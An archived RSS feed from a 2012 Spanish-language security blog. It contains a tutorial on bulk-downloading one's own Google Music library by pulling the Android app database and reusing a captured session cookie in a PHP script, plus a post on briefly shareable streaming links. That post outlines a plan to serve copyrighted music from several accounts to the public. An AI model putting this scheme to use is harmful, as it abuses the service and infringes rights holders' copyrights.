<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>(In)Secure México</title>
	<atom:link href="http://insecure.org.mx/feed" rel="self" type="application/rss+xml" />
	<link>http://insecure.org.mx</link>
	<description>(In) Secure México</description>
	<lastBuildDate>Sat, 19 May 2012 21:31:13 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Segunda temporada de (in)secure México</title>
		<link>http://insecure.org.mx/segunda-temporada-de-inescurre-mexico.html</link>
		<comments>http://insecure.org.mx/segunda-temporada-de-inescurre-mexico.html#comments</comments>
		<pubDate>Fri, 18 May 2012 16:53:06 +0000</pubDate>
		<dc:creator>zeux0r</dc:creator>
				<category><![CDATA[noticias]]></category>
		<category><![CDATA[sociales]]></category>
		<category><![CDATA[insecure]]></category>
		<category><![CDATA[reload]]></category>
		<category><![CDATA[segunda temporada]]></category>

		<guid isPermaLink="false">http://insecure.org.mx/?p=433</guid>
		<description><![CDATA[Después de un tiempo offline debido a causas ajenas a nosotros, retomamos nuevamente este proyecto de vídeos, noticias, podcast, reporte de vulnerabilidades, esta será nuestra segunda temporada, esperen algunos cambios]]></description>
			<content:encoded><![CDATA[<p><a href="http://insecure.org.mx/wp-content/uploads/2012/05/segunt.jpg"><img class="aligncenter size-full wp-image-434" title="segunt" src="http://insecure.org.mx/wp-content/uploads/2012/05/segunt.jpg" alt="segunda temporada" width="631" height="284" /></a></p>
<p>Después de un tiempo offline debido a causas ajenas a nosotros, retomamos nuevamente este proyecto de vídeos, noticias, podcast, reporte de vulnerabilidades, esta será nuestra segunda temporada, esperen algunos cambios</p>
]]></content:encoded>
			<wfw:commentRss>http://insecure.org.mx/segunda-temporada-de-inescurre-mexico.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Descargar mi Música de Google Music</title>
		<link>http://insecure.org.mx/descargar-mi-musica-de-google-music.html</link>
		<comments>http://insecure.org.mx/descargar-mi-musica-de-google-music.html#comments</comments>
		<pubDate>Sun, 12 Feb 2012 07:50:11 +0000</pubDate>
		<dc:creator>Komtec1</dc:creator>
				<category><![CDATA[Android]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[phpmyadmin]]></category>

		<guid isPermaLink="false">http://insecure.org.mx/?p=419</guid>
		<description><![CDATA[Bueno, el primer script ya quedo listo, como les dije en el post anterior, este es para descargar la música propia por lotes o por como ustedes gusten, si no recuerdan, comente en un post pasado que Google Music al subir tu música ya no te deja opción de descargarla a menos que lo hagas mediante Android y te la guarda como 1.mp3, 2.mp3, etc, etc, hay otra opción, que es Music Plus, un complemento que se instala en Chrome, [...]]]></description>
			<content:encoded><![CDATA[<div style="text-align: justify;">Bueno, el primer script ya quedo listo, como les dije en el post anterior, este es para descargar la música propia por lotes o por como ustedes gusten, si no recuerdan, comente en un post pasado que Google Music al subir tu música ya no te deja opción de descargarla a menos que lo hagas mediante Android y te la guarda como 1.mp3, 2.mp3, etc, etc, hay otra opción, que es Music Plus, un complemento que se instala en Chrome, pero este tienes que dar click en la cancion y te agrega una opcion que dice Descargar esta canción o algo asi dice <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </div>
<p>&nbsp;</p>
<div style="text-align: justify;">Bueno, este codigo y metodo es para que selecciones y descargues todas las canciones que quieras y/o busques, les explico a continuacion! <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </div>
<p>&nbsp;</p>
<div style="text-align: justify;">Requisitos:</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Teléfono con Android Rooteado</div>
<div style="text-align: justify;">WAMP ó LAMP (Windows/Linux Apache Mysql PHP) (para rapido y facil http://www.appservnetwork.com/ v 2.5.10)</div>
<div style="text-align: justify;">SQLite Browser (http://sourceforge.net/projects/sqlitebrowser/)</div>
<div style="text-align: justify;">Firefox (http://www.mozilla.org/en-US/firefox/new/)</div>
<div style="text-align: justify;">Live HTTP Headers (Addon de Firefox &#8211; https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/)</div>
<p>&nbsp;</p>
<div style="text-align: justify;">La primera opcion es tener un telefono Android rooteado, con Google Music instalado y nuestra música sincronizada, de ahi ir a la siguiente ruta:</div>
<div style="text-align: justify;">/data/data/com.google.android.music/databases/music.db</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Esto es para que podamos tomar la base de datos que maneja Google Music dentro de nuestros telefonos, ahí tenemos los datos para que despues podamos extraer nuestra musica y la guardemos en la pc (por si algun dia quieren recuperarla y no tenerla mas en la nube <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> )</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Ok, una vez que tengamos ese archivo lo que tenemos que hacer es abrir un editor de SQLite, (si no tienen uno o no conocen uno, puedes descargarlo de aqui: http://sourceforge.net/projects/sqlitebrowser/ ) ya que lo instalamos, vamos a la parte de Browse Data y seleccionamos la tabla MUSIC, una vez que lo hayamos hecho, damos en file &#8211; export, y guardamos el archivo donde queramos en nuestra pc.</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Una vez que se haya exportado el archivo .sql lo unico que vamos a necesitar son los datos de la tabla MUSIC, yo importe esa tabla a MySQL, (se me hace mucho mas facil y rapido de manejar)</div>
<p><span id="more-419"></span></p>
<div style="text-align: justify;">Este es el primero sql que van a ejecutar:</div>
<div style="text-align: justify;">CREATE TABLE `music` (</div>
<div style="text-align: justify;">`Id` int(11) NOT NULL auto_increment,</div>
<div style="text-align: justify;">`SourceAccount` int(11) NOT NULL,</div>
<div style="text-align: justify;">`SourceId` text NOT NULL,</div>
<div style="text-align: justify;">`SourcePath` text,</div>
<div style="text-align: justify;">`Size` int(11) NOT NULL,</div>
<div style="text-align: justify;">`FileType` int(11) NOT NULL,</div>
<div style="text-align: justify;">`FileDate` int(11) NOT NULL,</div>
<div style="text-align: justify;">`LocalCopyPath` text,</div>
<div style="text-align: justify;">`LocalCopyType` int(11) NOT NULL,</div>
<div style="text-align: justify;">`PlayCount` int(11) NOT NULL default &#8217;0&#8242;,</div>
<div style="text-align: justify;">`LastPlayDate` int(11) NOT NULL default &#8217;0&#8242;,</div>
<div style="text-align: justify;">`Title` text NOT NULL,</div>
<div style="text-align: justify;">`Album` text,</div>
<div style="text-align: justify;">`Artist` text,</div>
<div style="text-align: justify;">`AlbumArtist` text,</div>
<div style="text-align: justify;">`AlbumArtistOrigin` int(11) default NULL,</div>
<div style="text-align: justify;">`Composer` text,</div>
<div style="text-align: justify;">`Genre` text,</div>
<div style="text-align: justify;">`Year` int(11) default NULL,</div>
<div style="text-align: justify;">`Duration` int(11) default NULL,</div>
<div style="text-align: justify;">`TrackCount` int(11) default NULL,</div>
<div style="text-align: justify;">`TrackNumber` int(11) default NULL,</div>
<div style="text-align: justify;">`DiscCount` int(11) default NULL,</div>
<div style="text-align: justify;">`DiscNumber` int(11) default NULL,</div>
<div style="text-align: justify;">`Compilation` int(11) default NULL,</div>
<div style="text-align: justify;">`BitRate` int(11) default NULL,</div>
<div style="text-align: justify;">`AlbumArtLocation` text,</div>
<div style="text-align: justify;">`SongId` int(11) NOT NULL,</div>
<div style="text-align: justify;">`AlbumId` int(11) NOT NULL default &#8217;0&#8242;,</div>
<div style="text-align: justify;">`AlbumArtistId` int(11) NOT NULL default &#8217;0&#8242;,</div>
<div style="text-align: justify;">`GenreId` int(11) NOT NULL default &#8217;0&#8242;,</div>
<div style="text-align: justify;">`CanonicalName` text NOT NULL,</div>
<div style="text-align: justify;">`CanonicalAlbum` text,</div>
<div style="text-align: justify;">`CanonicalAlbumArtist` text,</div>
<div style="text-align: justify;">`CanonicalGenre` text,</div>
<div style="text-align: justify;">`_sync_dirty` int(11) NOT NULL default &#8217;0&#8242;,</div>
<div style="text-align: justify;">`_sync_version` text,</div>
<div style="text-align: justify;">`LocalCopySize` int(11) default &#8217;0&#8242;,</div>
<div style="text-align: justify;">`TrackType` int(11) NOT NULL default &#8217;0&#8242;,</div>
<div style="text-align: justify;">`LocalCopyBitrate` int(11) NOT NULL default &#8217;0&#8242;,</div>
<div style="text-align: justify;">`ArtistOrigin` int(11) NOT NULL default &#8217;0&#8242;,</div>
<div style="text-align: justify;">`ArtistId` int(11) NOT NULL default &#8217;0&#8242;,</div>
<div style="text-align: justify;">`CanonicalArtist` text,</div>
<div style="text-align: justify;">`Rating` int(11) NOT NULL default &#8217;0&#8242;,</div>
<div style="text-align: justify;">`StoreId` text,</div>
<div style="text-align: justify;">`StoreAlbumId` text,</div>
<div style="text-align: justify;">PRIMARY KEY (`Id`)</div>
<div style="text-align: justify;">) ENGINE=MyISAM DEFAULT CHARSET=utf8 ;</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Esto nos va a crear la tabla de MUSIC dentro de MySQL, ahora abrimos el archivos SQL que exportaron y seleccionan todo lo de INSERT INTO MUSIC, algo como lo siguiente:</div>
<p>&nbsp;</p>
<div style="text-align: justify;">INSERT INTO MUSIC VALUES(1,-xxxxxx,&#8217;xxxxxxxx-xxxx-xxxxxx-9f1f-cf424f808f58&#8242;,&#8217;https://android.clients.google.com/music/mplay?songid=xxxxxxx-0340-37b0-9f1f-cf424f808f58&#8242;,xxxxx,x,xxxxxxxxxxx,NULL,0,0,0,&#8217;Now&#8221;s not the Time&#8217;,'Research&#8217;,'Seth Kauffman&#8217;,'Seth Kauffman&#8217;,0,&#8221;,&#8217;Rock&#8217;,0,204000,0,2,1,1,0,0,&#8217;http://lh5.ggpht.com/xxxxxxxxxxxxxxpu-PCi3_-TKm1rVGk4rgb3eA7W4mA3o=s200-c&#8217;,4xxxxxx061,200xxxxxx,xxxxxx29,6xxxxx8,&#8217;now&#8221;s not the time&#8217;,'research&#8217;,'seth kauffman&#8217;,'rock&#8217;,0,13xxxxxx623080,0,2,0,0,xxxxx7129,&#8217;seth kauffman&#8217;,0,NULL,NULL);</div>
<p>&nbsp;</p>
<div style="text-align: justify;">El total de registros ahí es el total de registros que tienen de canciones, osea, si tienen 10 canciones en google music, van a ser 10 inserts.</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Una vez que hayamos ingresado los datos a MySQL, lo que hacemos ahora es configurar el archivo php que les dejo (<a href="http://www.mediafire.com/?1dpdvy1xvvg296t" target="_blank">click aqui para descargarlo)</a>, primero lo extraemos en www (c:\appserv\www si es el caso que instalaron appserv), en una carpeta que se llame gmusic (o como le quieran poner, es un archivo php y una carpeta llamada media), una vez que este ahi, lo abrimos y tenemos que cambiar varios parametros, veamos cuales:</div>
<p>&nbsp;</p>
<div style="text-align: justify;">en la linea 120 tenemos los datos para conectarse a MySQL, cambiamos ahí por nuestros datos:</div>
<div style="text-align: justify;">$dbname = &#8216;nombredetudb&#8217;;</div>
<div style="text-align: justify;">$dbusername = &#8216;tuusuario&#8217;;</div>
<div style="text-align: justify;">$dbuserpass = &#8216;tucontrasenia&#8217;;</div>
<p>&nbsp;</p>
<div style="text-align: justify;">en la linea 253 tenemos el header que se envia para la coneccion a google music, este lo vamos a obtener por medio de Live HTTP Headers, abrimos firefox, entramos a music.google.com y nos logueamos con nuestra cuenta, una vez que estemos ahi, abrimos Live HTTP Headers y le damos click a cualquier cancion para que empiece a reproducir, nos captura los headers que enviamos, entre ellos va nuestra cookie, algo como lo que muestro en la imagen:</div>
<p>&nbsp;</p>
<div class="separator" style="clear: both; text-align: justify;"><a style="margin-left: 1em; margin-right: 1em;" href="http://img718.imageshack.us/img718/7149/livehttpheaders.png"><img src="http://img718.imageshack.us/img718/7149/livehttpheaders.png" alt="" width="320" height="214" border="0" /></a></div>
<p>&nbsp;</p>
<div style="text-align: justify;">Damos en click derecho y copiar, de esta forma ya tenemos nuestros datos de acceso para google, y eso lo vamos a pegar en la linea 253 que dice:</div>
<div style="text-align: justify;">&#8216;header&#8217;=&gt;&#8221;aquivaloquecopiaste_lacookie&#8221;,</div>
<div style="text-align: justify;">borramos aquivaloquecopiaste_lacookie y pegamos lo recien seleccionado.</div>
<div style="text-align: justify;">Si llevamos todos los pasos hasta aquí y no te has perdido, entonces lo siguiente que puedes hacer es abrir tu navegador preferido! (recomiendo chrome por la gestion de memoría que hace) y entrar a http://127.0.0.1/gmusic/descargar.php, una vez que estemos ahi vamos a ver una pantalla como esta:</div>
<p>&nbsp;</p>
<div class="separator" style="clear: both; text-align: justify;"><a style="margin-left: 1em; margin-right: 1em;" href="http://img714.imageshack.us/img714/7886/pantallainicial.png"><img src="http://img714.imageshack.us/img714/7886/pantallainicial.png" alt="" width="320" height="200" border="0" /></a></div>
<div style="text-align: justify;">Ahi lo que vamos a hacer es buscar lo que queramos descargar, escribimos el nombre de la canción, artista o album que queramos y le damos en enter, en caso de que quieran descargar todo su archivo de musica solo den click en enter y les dará una lista de todas las canciones que tienen en su Google Music (recuerden que si son muchas canciones la peticion al dar solamente enter va a tardar algo).</div>
<div style="text-align: justify;">Una vez que lo hacemos, saldrá una pantalla como la siguiente:</div>
<div class="separator" style="clear: both; text-align: justify;"><a style="margin-left: 1em; margin-right: 1em;" href="http://img692.imageshack.us/img692/1158/imagendebusqueda.png"><img src="http://img692.imageshack.us/img692/1158/imagendebusqueda.png" alt="" width="320" height="200" border="0" /></a></div>
<p>&nbsp;</p>
<div style="text-align: justify;">Lo que podemos hacer ahí es seleccionar X numero de canciones para que las descargue ó presionar el enlace de Marcar todos para que nos seleccione todo lo que se haya encontrado en la lista y podamos descargarlo, en esta parte podemos organizar nuestra busqueda dando click en la parte de los titulos de las tablas, y asi ordenar por artista, album, cancion, duracion ó peso, si su busqueda es muy grande no lo recomiendo mucho, pues tardara un poco <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </div>
<div style="text-align: justify;">Una vez que hayamos seleccionado lo que queremos, vamos a dar click en Guardar canciones seleccionadas y esperamos un poco, en ese momento nos empieza a guardar las canciones que hayamos seleccionado en sus respectivas carpetas dentro de c:\appserv\www\gmusic (o el nombre que hayamos puesto), por ejemplo, si tenemos el artista &#8220;Uno&#8221; el album &#8220;Albumsito&#8221; y la cancion &#8220;Buena Cancion&#8221; nos lo guardará de la siguiente forma:</div>
<div style="text-align: justify;">c:\appserv\www\gmusic\Uno\Albumsito\Buena Cancion.mp3</div>
<p>&nbsp;</p>
<div class="separator" style="clear: both; text-align: justify;"><a style="margin-left: 1em; margin-right: 1em;" href="http://img844.imageshack.us/img844/6787/acomodado.png"><img src="http://img844.imageshack.us/img844/6787/acomodado.png" alt="" width="320" height="200" border="0" /></a></div>
<p>&nbsp;</p>
<div style="text-align: justify;">Una vez que el script termina de guardar las canciones seleccionadas nos mostrará un aviso que termino de descargar, en ese momento podemos cerrar nuestro navegador y seguir haciendo lo que queramos <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  (disfrutar de su musica local nuevamente podria ser <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> )</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Bueno, ese es el primer post, de como descargar SU música por lotes.</div>
<p>&nbsp;</p>
<div style="text-align: justify;">¿Enredado? ¿Largo? Es mas de lo que parece, una vez que lo hagan verán que no es complicado <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </div>
<p>&nbsp;</p>
<div style="text-align: justify;">Estoy trabajando en un script que extraiga los datos directo de music.google.com y de esta forma no necesitemos nuestro Android Rooteado, en caso de que lo termine les aviso por un post tambien.</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Pronto tendremos la página de prueba para poder descargar las canciones mediante este servicio, lo que explico aqui <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' />  pero que no sea de manera local, por mientras pueden ir dejando un listado de grupos favoritos? enviarlo por twitter (@komtec1) o por correo, o dejar comentario aqui en el blog, recuerden que esta parte puede tardar un poco mas, por que quiero tener una base de datos de al menos 100,000 canciones, osea 5 cuentas en su máxima capacidad <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  asi que como repito, me vendría bien el apoyo para sugerencias musicales que esten en la db. <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </div>
<p>&nbsp;</p>
<div style="text-align: justify;">De todas formas sigan pendientes ^^ espero les haya gustado y les sirva este post, dejo las siguientes paralabras clave para que lleguen por medio de buscadores.</div>
<div style="text-align: justify;">Descargar toda mi musica de google music</div>
<div style="text-align: justify;">Cmo descargo mi musica de google music</div>
<div style="text-align: justify;">Forma de descargar mi musica de google music</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Y pongo el video de como funciona el script, le agregue jquery y datatables, por si se preguntan con que es lo que hago el sort de la tabla <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </div>
<p>&nbsp;</p>
<div style="text-align: justify;"><iframe src="http://www.youtube.com/embed/n6bicKwYvuA" frameborder="0" width="420" height="315"></iframe></div>
<p>PD Copie y pegue de Blogspot y traté de arreglar el formato, por eso se ve medio feo jejej :$</p>
<div style="text-align: justify;">Saludos! <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Komtec1</div>
]]></content:encoded>
			<wfw:commentRss>http://insecure.org.mx/descargar-mi-musica-de-google-music.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Google Music NO ofrece privacidad de Datos, lo cual puede ser util };-D</title>
		<link>http://insecure.org.mx/google-music-no-ofrece-privacidad-de-datos-lo-cual-puede-ser-util-d.html</link>
		<comments>http://insecure.org.mx/google-music-no-ofrece-privacidad-de-datos-lo-cual-puede-ser-util-d.html#comments</comments>
		<pubDate>Wed, 08 Feb 2012 23:40:29 +0000</pubDate>
		<dc:creator>Komtec1</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://insecure.org.mx/?p=407</guid>
		<description><![CDATA[Hola!! Como puse en un post anterior aqui merito mismo en mi blog, estaba revisando unas cosas sobre Google Music, por casualidad, causalidad o como lo quieran llamar encontre lo que a mi parecer son unos fallos de seguridad, yo como niño bueno, los reporte a Google, pero ellos me contestaron que naranjas dulces, que no es fallo de seguridad , por lo que si ellos dicen que no es nada malo, entonces puedo liberarlo y empezar a hacer herramientas [...]]]></description>
			<content:encoded><![CDATA[<p>Hola!!</p>
<p>Como puse en un <a title="Datos Privados en Google Music?" href="http://komtec1.blogspot.com/2012/02/datos-privados-en-google-music.html" target="_blank">post</a> anterior aqui merito mismo en mi blog, estaba revisando unas cosas sobre Google Music, por casualidad, causalidad o como lo quieran llamar encontre lo que a mi parecer son unos fallos de seguridad, yo como niño bueno, los reporte a Google, pero ellos me contestaron que naranjas dulces, que no es fallo de seguridad <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> , por lo que si ellos dicen que no es nada malo, entonces puedo liberarlo y empezar a hacer herramientas para eso, pues es 100% legal y no es un fallo de seguridad <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  (al final pongo lo que me contestaron <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> )</p>
<p>El diagrama del fallo (segun yo) es el que pongo a continuación (no soy un experto en diagramas, digan que hice una imagen, generalmente lo explicaría con texto! xD)</p>
<p style="text-align: center;"><a href="http://img638.imageshack.us/img638/396/gmusicdia.jpg"><img class="aligncenter" title="Diagrama" src="http://img638.imageshack.us/img638/396/gmusicdia.jpg" alt="Diagrama de losServidores de Google xDD" width="560" height="266" /></a></p>
<p style="text-align: center;">(click para ver en grandote la imágen)</p>
<p>Por pasos:<br />
1.- es lo normal, user y pass para ingresar a gmail<br />
2.- te setean cookies en el navegador para que puedas ingresar a tus servicios de google<br />
3.- en music.google.com buscas la cancion que tu quieras</p>
<p>En este punto (4) esta lo interesante&#8230;</p>
<p>4.- se genera el streaming</p>
<p>Primero, en la base de datos de Google MUsic estan varias tablas, las cuales listo a continuación:</p>
<p><code>[table] ARTWORK<br />
AlbumId<br />
LocalLocation<br />
[table] KEEPON<br />
KeepOnId<br />
ListId<br />
AlbumId<br />
ArtistId<br />
DateAdded<br />
[table] LISTITEMS<br />
Id<br />
ListId<br />
MusicSourceAccount<br />
MusicSourceId<br />
ClientPosition<br />
ServerPosition<br />
SourceAccount<br />
SourceId<span id="more-407"></span><br />
[table] LISTITEM_TOMBSTONES<br />
Mi tabla aqui esta vacia<br />
[table] LISTS<br />
Id<br />
Name<br />
SourceAccount<br />
SourceId<br />
_sync_version<br />
_sync_dirty<br />
MediaStoreId<br />
ListType<br />
ListArtworkLocation<br />
[table] LIST_TOMBSTONES<br />
Mi tabla aqui esta vacia<br />
[table] MUSIC<br />
Id<br />
SourceAccount<br />
SourceId<br />
SourcePath<br />
Size<br />
FileType<br />
FileDate<br />
LocalCopyPath<br />
LocalCopyType<br />
PlayCount<br />
LastPlayDate<br />
Title<br />
Album<br />
Artist<br />
AlbumArtist<br />
AlbumArtistOrigin<br />
Composer<br />
Genre<br />
Year<br />
Duration<br />
TrackCount<br />
TrackNumber<br />
DiscCount<br />
DiscNumber<br />
Compilation<br />
BitRate<br />
AlbumArtLocation<br />
SongId<br />
AlbumId<br />
AlbumArtistId<br />
GenreId<br />
CanonicalName<br />
CanonicalAlbum<br />
CanonicalAlbumArtist<br />
CanonicalGenre<br />
_sync_dirty<br />
_sync_version<br />
LocalCopySize<br />
TrackType<br />
LocalCopyBitrate<br />
ArtistOrigin<br />
ArtistId<br />
CanonicalArtist<br />
Rating<br />
StoreId<br />
StoreAlbumId<br />
[table] RECENT<br />
RecentId<br />
ItemDate<br />
RecentListId<br />
RecentAlbumId<br />
[table] RINGTONES<br />
Vacia<br />
[table] SHOULDKEEPON<br />
MusicId<br />
KeepOnId<br />
[table] _sync_state<br />
_id<br />
account_name<br />
account_type<br />
data<br />
[table] _sync_state_metadata<br />
version<br />
[table] android_metadata<br />
locale</code></p>
<p>La por ahorita nos interesa (no digo que las demás no tengan cosas buenas, por ejemplo la de _sync_state nos guarda los datos de logueo <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' />  encriptados claro) es la de MUSIC</p>
<p>En esta tabla nos guarda la lista de todas las canciones (yo apenas tengo 11,482 <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> ) que tenemos dentro de nuestra cuenta de Google Music, el campos SourceId nos guarda un valor como este:</p>
<p><code>251c2c68-0340-37b0-9f1f-cf424f808f58<br />
</code><br />
En realidad este es el principal campo que nos importa, los demas son solo para hacer mas &#8220;fancy&#8221; todo esto (despues verán por que <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> )</p>
<p>Al ver los headers enviados/recibidos con HttpLiveHeaders (no, no me pagan publicidad), podremos ver algo como esto:</p>
<p><code>https://music.google.<br />
com/music/play?u=0&amp;songid=2fafbe9b-db96-3624-97e6-7e52e3e3b463&amp;pt=e     =&gt; de ahora en adelante UNO<br />
GET /music/play?u=0&amp;songid=2fafbe9b-db96-3624-97e6-7e52e3e3b463&amp;pt=e HTTP/1.1<br />
</code></p>
<p>y de ahi obtenemos una respuesta de la siguiente forma:</p>
<p><code>http://t.doc-0-0-sj.sj.googleusercontent.<br />
com/stream/105?id=6a523ee5f96bad0e&amp;itag=25&amp;source=skyjam&amp;<br />
o=07065478407166026385&amp;ip=0.0.0.0&amp;ipbits=0&amp;expire=1328258623&amp;<br />
sparams=id,itag,source,o,ip,ipbits,expire&amp;<br />
signature=7A0C93172AB4B8E0657927ACF5D04E610E64D01C.3BDF980C824B97C35F3CB8238434E39ADFC83AE&amp;key=sj2     =&gt; de ahora en adelante DOS</code></p>
<p>Si se dan cuenta el id principal de UNO no aparece ya en DOS, pero! ya tenemos un link valido para que podamos escuchar nuestra musiquita! <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Hasta este momento llega el punto 6 del diagrama (espero hayan seguido mediante el relato el punto 5 y 6 xD)</p>
<p>Hace tiempo vi a DOS, y lo que hice, fue enviarselo a un amigo para que verificara si el podía escuchar la cancion que yo escuchaba en ese momento, como era de esperarse, nos regresa un error 403 (si es que ya entraron a DOS), por lo cual yo en ese momento dije: CLAP CLAP valida de forma genial nuestros datos y tenemos privacidad hasta en nuestra música!</p>
<p>Al analizar la base de datos vi una imagen que se podía abrir desde cualquier sitio, como lo explique en mi post anterior, por lo que segui tratando de escuchar ese link de música desde otro dispositivo.</p>
<p>Al abrirlo con Chrome la musica empezo a escucharse, por lo que probe de nuevo dando f5 y me dio un 403! Raro que pueda escucharlo un momento si y otro no, creo yo.</p>
<p>Haciendo mas pruebas, vi en el link que tiene un timestamp que recibe la variable de expires, el link caduca generalmente cada 30 segundos aproximadamente, osea, en otras palabras es visible para quien sea durante 30 segundos!!!!</p>
<blockquote><p>&#8221;<br />
Google lo que respondio fue esto:</p>
<p>Hey,</p>
<p>Thanks for your email! I&#8217;ve talked with the Music team and they&#8217;ve<br />
confirmed this is expected behaviour. Since the link is only valid for a<br />
short period of time, there isn&#8217;t much potential for abuse.</p>
<p>Also, the URL is unguessable so an attacker can&#8217;t obtain a valid link<br />
without some other vulnerability. If you do find a way for an attacker to<br />
generate or obtain a valid link without the victim knowing, then this<br />
would be considered a vulnerability.</p>
<p>Cheers,<br />
XXXXXXX<br />
&#8220;</p></blockquote>
<p>Me parece genial, igual y como lo mencionan ellos, puede que no sea un bug de seguridad, pero creo yo, que si subo un archivo personal a un servicio con contraseña, este tiene que ser visible solo para mi no? si no para que me logueo en mi cuenta de GMusic para escuchar musica, mejor solo hacer un servicio que ponga mi usuario y me de la lista de canciones que tengo disponibles!</p>
<p>Ah bueno, ahi es cuando llegaron mas ideas:</p>
<p>1.- Hacer un script para descargar MI música por lotes en caso de que la necesite</p>
<p>Si! es que google music una vez que la subes te fregaste y no puedes descargarla por lotes, a menos que sea desde android y des click en disponible sin coneccion, y te lo guarda como 1.mp3 2.mp3, etc, etc, no te da el nombre, ni titulo, ni disco, si estan en los metadatos pues ya fregaste y lo puedes visualizar asi en winamp o el reproductor de su eleccion (aunque sea por consola kof kof @hecky jeje <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> ).</p>
<p>Entonces aqui entra en nuestro auxilio las tablas de google nuevamente, dentro de MUSIC vamos a utilizar el campo Title, Album, Artist que son los que contienen la informacion de nuestro archivo musical.</p>
<p>Estoy en el desarrollo de esto, en cuanto quede les explicare paso a paso con naranjas y manzanas (por que hay muchos usuarios no experimentados que quieren hacer esto) para que lo puedan hacer <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>2.- Este punto creo yo es el peor para google y lo explico a continuación:</p>
<p>Cada cuenta de google music puede almacenar 20 mil canciones, ok, creo 10 cuentas, podre almacenar 200,000 canciones, wow eso suena genial! ahora, que tal si X persona puede descargar una de esas canciones con el ancho de banda de google? en descarga directa? por lotes? en por lotes me refiero a discos completos, canciones seleccionadas, incluso artistas completos (discografias) que esten en algunas de esas 10 cuentas de Google!?</p>
<p>A mi parecer sería genial!!!</p>
<p>No se meteria en problemas legales google? Megaupload, segun todos el culpable fue la compañia, siendo que realmente los culpables (creo yo, de manera muy personal claro) fuimos nosotros, piratebay y demas empresas donde hay alojamiento con Copyright no se han metido en problemas?</p>
<p>Obvio, esto es pensando que el servicio crecería muy rapido, pero, siendo un servicio tan eficaz yo creo que si lo haría, cuando hice musicindexof.com solo ponia links en descarga directa y en un mes alcanzo un PR de 4 (si, en un mes de cuando se registro, abrio y transcurrieron 30 dias), y en ese entonces NO existia (o yo no usaba al menos) twitter, asi que la difusion sería mas rapida creo yo.</p>
<p>La idea es esta:</p>
<p>Hacer un script, primero, tendra la base de datos de las 5 cuentas, esto con cualquier gestor de DB es lo de menos, tendra los datos importantes arriba mencionados, &#8220;osease&#8221; el ID y nombre, artista, album y cuenta de google (esto esta en el campo SourceAccount de la tabla MUSIC) con eso al principio es mas que suficiente, nuestro script se loguea a nuestra cuenta 1 de google, guarda las cookies y repite el mismo paso con la cuenta 2,3,4,etc, de ahi ya estamos autentificados, ahora el usuario hace una busqueda de la cancion juanito con el artista perez, si esta en la base de datos regresa un link valido por 30 segundos para descargar, escuchar online, etc, etc.</p>
